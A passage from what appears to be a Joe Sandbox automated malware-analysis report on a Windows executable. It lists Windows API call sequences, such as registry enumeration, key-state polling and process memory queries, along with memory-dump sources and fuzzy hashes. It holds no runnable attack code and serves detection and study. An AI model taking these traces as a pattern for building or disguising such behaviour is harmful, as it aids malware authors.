                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                            • Instruction ID: 3a9fffd2e99ff55030e4788a991c608e9c08d8bb738c80722c17144d2858802a
                                                            • Opcode Fuzzy Hash: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                                                            • Instruction Fuzzy Hash: 7B21C7795003059BDB209F69CC04A9B77A8EF44724F210B1EFCA0D33D0E7759851C75A
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0046AC54
                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
                                                            • __swprintf.LIBCMT ref: 0046ACC1
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046ACFF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                            • String ID: %lu
                                                            • API String ID: 3164766367-685833217
                                                            • Opcode ID: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                                            • Instruction ID: 026ba00fef41ead7d753cb67677e2cef5533d5e87c35db631ff5a0b10e4673a5
                                                            • Opcode Fuzzy Hash: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                                                            • Instruction Fuzzy Hash: FE217470600109AFCB10EF65C945DAE77B8EF49318B10447EF905AB252DA35EE55CB25
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046115F
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 00461184
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046118E
                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 004611C1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: CounterPerformanceQuerySleep
                                                            • String ID: @F
                                                            • API String ID: 2875609808-2781531706
                                                            • Opcode ID: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                            • Instruction ID: bb6757969e877831e55d7075b4886ee1e071d58b2ed1133263d880316bc49dff
                                                            • Opcode Fuzzy Hash: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                                                            • Instruction Fuzzy Hash: B5113071D0051DD7CF00DFA5D9486EEBB78FF0E711F04446ADA41B2250DB789954CB9A
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00B93F73,00000003,?,00B93F13,00000003,00BADE80,0000000C,00B9403D,00000003,00000002), ref: 00B93FE2
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B93FF5
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00B93F73,00000003,?,00B93F13,00000003,00BADE80,0000000C,00B9403D,00000003,00000002,00000000), ref: 00B94018
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: e92948c3f2568b5f310b85d147fe84f8c7bd2e59ca11c1427deced01e9f30af7
                                                            • Instruction ID: 841f0de2569f81349762e3970c42a7853f13debcd07c9a3b7355c7c62cfdd036
                                                            • Opcode Fuzzy Hash: e92948c3f2568b5f310b85d147fe84f8c7bd2e59ca11c1427deced01e9f30af7
                                                            • Instruction Fuzzy Hash: ADF04F30A54218BBCF119F94DD0ABAEBFF5EB05751F0040A5F805A3160DF759A45CBD1
                                                            APIs
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
                                                            • CloseHandle.KERNEL32(?), ref: 0047EDEB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                            • String ID:
                                                            • API String ID: 2364364464-0
                                                            • Opcode ID: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                                            • Instruction ID: fffec5fe55f17e3d6af6322d033c5a61601868e7b6c72126a0bd4eac84abd099
                                                            • Opcode Fuzzy Hash: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                                                            • Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49
                                                            APIs
                                                              • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                              • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048013C
                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
                                                            • RegCloseKey.ADVAPI32(?,?), ref: 004801AF
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004801BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                            • String ID:
                                                            • API String ID: 3440857362-0
                                                            • Opcode ID: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
                                                            • Instruction ID: 88ea7daa6ea56d794f8f44f15d5cebce8ee28ea1eb3ac59e56a3faba9080710b
                                                            • Opcode Fuzzy Hash: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
                                                            • Instruction Fuzzy Hash: 00517E71214204AFC704EF54C885E6FB7E8FF84318F40492EF595972A2DB39E909CB56
                                                            APIs
                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E61F
                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E648
                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E687
                                                              • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                              • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E6AC
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E6B4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1389676194-0
                                                            • Opcode ID: 275178c4eb982dd088ec01f3bf93205d68bc615ff41be191cb77d3319cfa7593
                                                            • Instruction ID: 91bc9b0f2d422c2787d2346e32f4aa496c052f5f6ad9ddd010e4038a96899c27
                                                            • Opcode Fuzzy Hash: 275178c4eb982dd088ec01f3bf93205d68bc615ff41be191cb77d3319cfa7593
                                                            • Instruction Fuzzy Hash: 21514D75A00105DFCB01EF65C981AAEBBF5EF09314F1480AAE809AB3A2DB35ED11CF55
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                                            • Instruction ID: 1d009f8157befd3e54c409f5ed609bf9f47d87f5e0fd5ad8ffda0b3aa488663e
                                                            • Opcode Fuzzy Hash: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                                            • Instruction Fuzzy Hash: A1419435904114ABE710FF24CC4CFAEBBA4EB09310F144A67E815A73E1C7B8AD65D75A
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 00402357
                                                            • ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                                            • GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                            • GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorScreen
                                                            • String ID:
                                                            • API String ID: 4210589936-0
                                                            • Opcode ID: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                                            • Instruction ID: 839f7de4dd1eaa7d0d5dffd0863558e2d4fc2f6d206a63eef28a724dc464cb27
                                                            • Opcode Fuzzy Hash: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                                            • Instruction Fuzzy Hash: EB416135504115FBCF199FA9C848AEEBB74FB09364F20432BE825A22D0C7789D54DB95
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004563E7
                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 00456433
                                                            • TranslateMessage.USER32(?), ref: 0045645C
                                                            • DispatchMessageW.USER32(?), ref: 00456466
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00456475
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                            • String ID:
                                                            • API String ID: 2108273632-0
                                                            • Opcode ID: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                                            • Instruction ID: 5e30e11b4a1e50e6093782a7c3f18569847dc725279de51faeef3c0bd44cbf51
                                                            • Opcode Fuzzy Hash: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                                            • Instruction Fuzzy Hash: 0A31A731500646AFDB648F74CC44FAB7BA8AB02306F95017AEC11C3262E729A4CDDB5D
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00458A30
                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 00458ADA
                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458AE2
                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 00458AF0
                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458AF8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleep$RectWindow
                                                            • String ID:
                                                            • API String ID: 3382505437-0
                                                            • Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                            • Instruction ID: 80642b6b9bd3aba6b5d9fb31be4e412888bcfd4668c130c4b2f9d35bc39c9ded
                                                            • Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                            • Instruction Fuzzy Hash: 9831DF71500219EBDF14CFA8D94CA9E3BB5EB04316F10862EF924E72D2CBB49D18CB94
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 0045B204
                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B221
                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B259
                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B27F
                                                            • _wcsstr.LIBCMT ref: 0045B289
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                            • String ID:
                                                            • API String ID: 3902887630-0
                                                            • Opcode ID: 6cc66ac60d2af55151ee0b8dc61b89e065b9431517b95cd5b538a8562ff810f2
                                                            • Instruction ID: 2c7352b259513f6215f8baf2ea9b1e154aa1926be373c141b5dda8785e83a564
                                                            • Opcode Fuzzy Hash: 6cc66ac60d2af55151ee0b8dc61b89e065b9431517b95cd5b538a8562ff810f2
                                                            • Instruction Fuzzy Hash: DF2103312042007BEB155B75AC09A7F7B98DB49711F10417EFC04DA262EF699C4597A8
                                                            APIs
                                                              • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0048B192
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B1B7
                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B1CF
                                                            • GetSystemMetrics.USER32(00000004), ref: 0048B1F8
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00470E90,00000000), ref: 0048B216
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$MetricsSystem
                                                            • String ID:
                                                            • API String ID: 2294984445-0
                                                            • Opcode ID: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                                            • Instruction ID: a9241cd50f58f28df48e309b6b0d701528321bfcfd0e0dab973ca591f656860e
                                                            • Opcode Fuzzy Hash: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                                            • Instruction Fuzzy Hash: D6218071910651AFCB10AF389C18A6F3BA4FB15361F144F3ABD32D72E0E73498618B98
                                                            APIs
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00459320
                                                              • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459352
                                                            • __itow.LIBCMT ref: 0045936A
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459392
                                                            • __itow.LIBCMT ref: 004593A3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow$_memmove
                                                            • String ID:
                                                            • API String ID: 2983881199-0
                                                            • Opcode ID: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                                            • Instruction ID: 968ba8743040f36d453ad30986a6980fa4fc6e9bba4f502b0ab074d445a6e810
                                                            • Opcode Fuzzy Hash: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                                            • Instruction Fuzzy Hash: 0821F831B00204FBDB10AA618C85EAE3BA8EF4C715F14403AFD04E72C2D6B89D49979A
                                                            APIs
                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
                                                            • SelectObject.GDI32(?,00000000), ref: 0040135C
                                                            • BeginPath.GDI32(?), ref: 00401373
                                                            • SelectObject.GDI32(?,00000000), ref: 0040139C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            • Opcode ID: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                                            • Instruction ID: 345c33b4cc72e80acb91194012c3a0486190d93d7afc841094e42ad70741f55b
                                                            • Opcode Fuzzy Hash: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                                            • Instruction Fuzzy Hash: 74215130800604DFEB10AF15DC04B6E7BA8FB00351F54463BF810A61F0D778A8A5DFA9
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00464ABA
                                                            • __beginthreadex.LIBCMT ref: 00464AD8
                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00464AED
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464B03
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464B0A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
